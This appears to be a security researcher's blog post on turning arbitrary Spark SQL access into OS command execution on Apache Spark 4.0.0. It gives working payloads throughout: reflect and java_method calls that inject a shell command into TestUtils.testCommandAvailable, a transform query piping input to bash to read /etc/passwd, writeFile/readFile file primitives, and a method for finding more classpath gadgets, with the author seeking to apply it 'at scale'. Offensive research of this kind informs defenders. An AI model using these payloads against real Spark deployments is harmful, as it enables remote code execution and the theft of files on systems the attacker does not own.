Straight to the Point

Recently I encountered a web app that exposed the ability to run arbitrary Spark SQL commands. Of course, the first thing I wanted to do was see if I could run OS commands. Everything I am writing here today applies to the latest default installation of Apache Spark (I’m running it on Ubuntu). At the time of writing, the latest version is 4.0.0, released May 23, 2025.

My first Google searches landed me on this article: https://blog.stratumsecurity.com/2022/10/24/abusing-apache-spark-sql-to-get-code-execution/. The author shows that the reflect function can be used to invoke static methods of Java classes (these examples are copied from the article):

-- List environment variables
SELECT reflect('java.lang.System', 'getenv')

-- List system properties
SELECT reflect('java.lang.System', 'getProperties')

He includes a PoC for running OS commands which wasn’t working for me. I spent an embarrassing amount of time trying to make it work until I finally checked the code here: https://github.com/apache/spark/blob/master/core/src/main/scala/org/apache/spark/util/Utils.scala

def checkCommandAvailable(command: String): Boolean = {
  // To avoid conflicts with java.lang.Process
  import scala.sys.process.{Process, ProcessLogger}
  val attempt = if (Utils.isWindows) {
    Try(Process(Seq(
      "cmd.exe", "/C", s"where $command")).run(ProcessLogger(_ => ())).exitValue())
  } else {
    Try(Process(Seq(
      "sh", "-c", s"command -v $command")).run(ProcessLogger(_ => ())).exitValue())
  }
  attempt.isSuccess && attempt.get == 0
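}

The command argument is interpolated straight into the string handed to sh -c, so all that was required was to add a ; followed by a second command to get command injection. Here is my PoC: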

SELECT reflect('org.apache.spark.TestUtils', 'testCommandAvailable', 'ls; touch /tmp/urmum');

Bonus Material
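As a side note on why the extra ; in the PoC above works, here is a minimal Java sketch of the non-Windows branch quoted earlier. It is an illustration, not Spark's code: the names CommandInjectionSketch, buildArgv and run are made up, echo injected stands in for the touch payload so the effect shows up on stdout, and it assumes sh is on the PATH.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.List;

final class CommandInjectionSketch {

    // Mirrors Seq("sh", "-c", s"command -v $command"): the caller's string is
    // pasted into the shell script without any quoting or validation.
    static List<String> buildArgv(String command) {
        return List.of("sh", "-c", "command -v " + command);
    }

    // Runs the argv and returns everything the shell printed (stdout and stderr merged).
    static String run(List<String> argv) throws IOException, InterruptedException {
        Process p = new ProcessBuilder(argv).redirectErrorStream(true).start();
        String out = new String(p.getInputStream().readAllBytes(), StandardCharsets.UTF_8);
        p.waitFor();
        return out;
    }

    public static void main(String[] args) throws Exception {
        List<String> argv = buildArgv("ls; echo injected");
        System.out.println(argv.get(2)); // the script that sh receives
        System.out.print(run(argv));     // output of `command -v ls`, then of the second command
    }
}
```

In the quoted Spark code the output is thrown away by ProcessLogger(_ => ()) and only a Boolean comes back, which is why the PoC proves execution by creating a file rather than by printing anything.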

In addition to this already documented PoC, there are other techniques that can be used. Here is another example that is almost identical to the first:

SELECT java_method('org.apache.spark.TestUtils', 'testCommandAvailable', 'ls; touch /tmp/urmum2');

Here’s another one that’s different. It may be considered better than the first two because it doesn’t depend on some magical static method in the classpath AND it will return the command output in the response of the SQL query:

spark-sql (default)> select transform(*) using 'bash' from values('cat /etc/passwd');
root:x:0:0:root:/root:/bin/bash NULL
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin NULL
bin:x:2:2:bin:/bin:/usr/sbin/nologin NULL
...

More Bonus Material
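A note on the transform query above before moving on: the trailing NULL on every row is consistent with how the Spark SQL TRANSFORM documentation describes the default output (no AS clause): text before the first tab becomes a key column, the rest becomes a value column, and a line without a tab gets a NULL value. The Java sketch below models that under simplifying assumptions. TransformSketch, splitKeyValue and transform are hypothetical names, the way Spark actually launches the script is not reproduced, and the rows are simply written to the script's stdin one per line.

```java
import java.io.IOException;
import java.io.OutputStream;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;

final class TransformSketch {

    // Default output handling without an AS clause, as documented for TRANSFORM:
    // key = text before the first tab, value = the rest, null when there is no tab.
    static String[] splitKeyValue(String line) {
        int tab = line.indexOf('\t');
        return tab < 0
            ? new String[] { line, null }
            : new String[] { line.substring(0, tab), line.substring(tab + 1) };
    }

    // Feeds each input row to the script's stdin and turns each stdout line into a row.
    // Fine for tiny inputs; a real implementation would read and write concurrently.
    static List<String[]> transform(String script, List<String> rows)
            throws IOException, InterruptedException {
        Process p = new ProcessBuilder(script)
            .redirectError(ProcessBuilder.Redirect.DISCARD)
            .start();
        try (OutputStream stdin = p.getOutputStream()) {
            for (String row : rows) {
                stdin.write((row + "\n").getBytes(StandardCharsets.UTF_8));
            }
        } // closing stdin tells the script there is no more input
        String out = new String(p.getInputStream().readAllBytes(), StandardCharsets.UTF_8);
        p.waitFor();
        List<String[]> result = new ArrayList<>();
        for (String line : out.split("\n")) {
            if (!line.isEmpty()) result.add(splitKeyValue(line));
        }
        return result;
    }

    public static void main(String[] args) throws Exception {
        // With 'bash' as the script, every input row is read from stdin and executed.
        for (String[] kv : transform("bash", List.of("echo hello from bash"))) {
            System.out.println(kv[0] + " " + (kv[1] == null ? "NULL" : kv[1]));
        }
    }
}
```

The point of the sketch is that the row values themselves become the commands: bash reads them from stdin, so whatever appears in values(...) is executed and its output comes back as query rows.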

What if transform isn’t working? What if testCommandAvailable is unavailable? As long as java_method or reflect is still available, we can investigate what else is on the classpath in hopes of discovering additional interesting methods. To see what’s loaded we can use the PoC from above:

spark-sql (default)> SELECT reflect('java.lang.System', 'getProperties');

{spark.submit.pyFiles=, java.specification.version=17, sun.jnu.encoding=UTF-8, java.class.path=hive-jackson/jackson-core-asl-1.9.13.jar:hive-jackson/jackson-mapper-asl-1.9.13.jar:/root/spark-4.0.0-bin-hadoop3/conf/:/root/spark-4.0.0-bin-hadoop3/jars/slf4j-api-2.0.16.jar:/root/spark-4.0.0-bin-hadoop3/jars/netty-codec-http2-4.1.118.Final.jar:/root/spark-4.0.0-bin-hadoop3/jars/spark-graphx_2.13-4.0.0.jar:/root/spark-4.0.0-bin-hadoop3/jars/kubernetes-model-flowcontrol-7.1.0.jar

...

Now I will reveal my primitive methodology for finding #interestingMethods. Pick a jar from the classpath, e.g. antlr4-runtime-4.13.1.jar.

- google for antlr4-runtime javadoc
- click the result that takes you to javadoc.io
- click index in the top menu
- copy/paste the full text of the page into notepad++
- do regex search in notepad++ for string.*static

For the love of god someone tell me a better way. PLEASE!
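One possible alternative to the copy/paste steps above, offered as a sketch rather than a finished tool: let Java reflection list the candidates directly from a jar. StaticStringMethodFinder, candidates and scanJar are hypothetical names. The filter (public static methods whose parameters are all String) deliberately mirrors the string.*static search; reflect may accept other argument types as well, which this ignores. Classes are loaded without running their static initializers, and classes that fail to load because of missing dependencies are skipped.

```java
import java.io.IOException;
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.net.URL;
import java.net.URLClassLoader;
import java.nio.file.Path;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Enumeration;
import java.util.List;
import java.util.jar.JarEntry;
import java.util.jar.JarFile;
import java.util.stream.Collectors;

final class StaticStringMethodFinder {

    // Public static methods of a public class that take one or more String parameters.
    static List<String> candidates(Class<?> cls) {
        List<String> found = new ArrayList<>();
        if (!Modifier.isPublic(cls.getModifiers())) return found;
        for (Method m : cls.getDeclaredMethods()) {
            int mod = m.getModifiers();
            Class<?>[] params = m.getParameterTypes();
            boolean allStrings = params.length > 0
                && Arrays.stream(params).allMatch(p -> p == String.class);
            if (Modifier.isPublic(mod) && Modifier.isStatic(mod) && allStrings) {
                String args = Arrays.stream(params)
                    .map(Class::getSimpleName)
                    .collect(Collectors.joining(", "));
                found.add(cls.getName() + "." + m.getName() + "(" + args + ") -> "
                    + m.getReturnType().getSimpleName());
            }
        }
        return found;
    }

    // Walks every .class entry in the jar and collects the candidates of each class.
    static List<String> scanJar(Path jar) throws IOException {
        List<String> found = new ArrayList<>();
        URL[] urls = { jar.toUri().toURL() };
        try (JarFile jarFile = new JarFile(jar.toFile());
             URLClassLoader loader = new URLClassLoader(urls)) {
            Enumeration<JarEntry> entries = jarFile.entries();
            while (entries.hasMoreElements()) {
                String name = entries.nextElement().getName();
                if (!name.endsWith(".class") || name.startsWith("META-INF/")
                        || name.endsWith("module-info.class")) {
                    continue;
                }
                String className = name.substring(0, name.length() - ".class".length())
                    .replace('/', '.');
                try {
                    // initialize=false: inspect the class without running its static initializer
                    found.addAll(candidates(Class.forName(className, false, loader)));
                } catch (LinkageError | ClassNotFoundException e) {
                    // Missing dependency or unloadable class: skip it
                }
            }
        }
        return found;
    }

    public static void main(String[] args) throws IOException {
        for (String jar : args) {
            scanJar(Path.of(jar)).forEach(System.out::println);
        }
    }
}
```

Assuming a JDK 11 or newer is at hand, this can be run straight from source with the jar path as an argument, for example java StaticStringMethodFinder.java followed by the path to antlr4-runtime-4.13.1.jar. The return type is printed so that methods returning something unhelpful to a SQL query, such as an array, can be spotted early.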





The two most interesting results from that jar are readFile and writeFile.

However, readFile may not actually be too useful: it returns a char[], so the result of the SQL query will not contain the file contents, just a reference to the array. Anyway, check out this example:

spark-sql (default)> SELECT reflect('org.antlr.v4.runtime.misc.Utils', 'writeFile', '/tmp/urmum3', 'i <3 2 hack');
null
Time taken: 0.045 seconds, Fetched 1 row(s)

spark-sql (default)> SELECT reflect('org.antlr.v4.runtime.misc.Utils', 'readFile', '/tmp/urmum3');
[C@6d13c57f
Time taken: 0.042 seconds, Fetched 1 row(s)
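The [C@6d13c57f value is what Java prints for a char[] when it is converted to a string as a plain Object. The short sketch below shows the difference; it assumes, without having checked the Spark source, that reflect stringifies the return value generically. CharArrayToStringSketch, generic and decoded are hypothetical names.

```java
final class CharArrayToStringSketch {

    // Generic Object-to-String conversion: for an array this yields the type tag
    // "[C" (char array), an "@", and a hex identity hash code.
    static String generic(Object result) {
        return String.valueOf(result);
    }

    // What a caller that knows it holds a char[] would do instead.
    static String decoded(char[] chars) {
        return new String(chars);
    }

    public static void main(String[] args) {
        char[] contents = "i <3 2 hack".toCharArray();
        System.out.println(generic(contents)); // starts with [C@, the hash varies per run
        System.out.println(decoded(contents)); // i <3 2 hack
    }
}
```

The transform query that follows reads the same file back through bash, which sidesteps the problem.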

spark-sql (default)> select transform(*) using 'bash' from values('cat /tmp/urmum3');
i <3 2 hack NULL
Time taken: 0.098 seconds, Fetched 1 row(s)

For the Future

I need to find a way to apply this technique at scale. If you have an idea please share it with me on twatter.
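One small step toward doing this at scale, sketched under assumptions: take the java.class.path value returned by the getProperties query and split it into the individual jars, so each one can be fed to whatever scanner you prefer. ClasspathJars and jars are hypothetical names, and the separator is passed in explicitly because it depends on the target OS (: on Linux, as in the output shown earlier).

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;

final class ClasspathJars {

    // Splits a java.class.path value and keeps only the .jar entries,
    // dropping directories such as .../conf/.
    static List<String> jars(String classPath, String separator) {
        List<String> result = new ArrayList<>();
        for (String entry : classPath.split(Pattern.quote(separator))) {
            if (entry.endsWith(".jar")) result.add(entry);
        }
        return result;
    }

    public static void main(String[] args) {
        // Pass the java.class.path value copied from the query result as the first argument.
        jars(args[0], ":").forEach(System.out::println);
    }
}
```

Note that the paths are those of the target host, so the jars still have to be obtained locally (for example from the matching Spark distribution) before they can be inspected.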